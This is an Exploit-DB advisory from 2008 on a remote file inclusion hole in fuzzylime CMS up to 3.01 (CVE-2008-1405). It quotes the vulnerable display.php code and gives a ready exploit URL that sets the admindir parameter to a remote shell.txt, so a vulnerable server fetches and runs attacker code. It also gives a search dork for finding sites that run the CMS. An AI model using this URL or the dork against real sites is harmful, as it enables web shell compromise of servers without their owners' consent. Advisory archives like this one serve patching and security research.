fuzzylime CMS <= 3.01 admindir Remote File Inclusion Vulnerability

2008-03-14T00:00:00
ID EDB-ID:5260
Type exploitdb
Reporter irk4z
Modified 2008-03-14T00:00:00

Description

fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability. CVE-2008-1405. Webapps exploit for php platform

                                        
                                            .-----------------------------------------------------------------------------.
|  vuln.: fuzzylime cms &lt;= 3.01 Remote File Inclusion Vulnerability           |
|  download: http://cms.fuzzylime.co.uk/                                      |
|  dork: "powered by fuzzylime"                                               |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: cOndemned, str0ke, wacky                                        |
'-----------------------------------------------------------------------------'

# code:

  /code/display.php:
  ... 
1    &lt;?
2    $s = $_GET[s];
3    $p = $_GET[p];
4    $s = str_replace("../", "", $s);
5    $p = str_replace("../", "", $p);
6    if(empty($s)) $s = "front";
7    if(empty($p)) $p = "index";
8    $curs = $s;
9    $curp = $p;
10
11   include "code/settings.inc.php";
12   include "${admindir}/languages/english.inc.php";
 ...

 line 11: ./code/code/settings.inc.php not exists so $admindir is empty :D:D
 
# exploit: 
 
 http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?

# milw0rm.com [2008-03-14]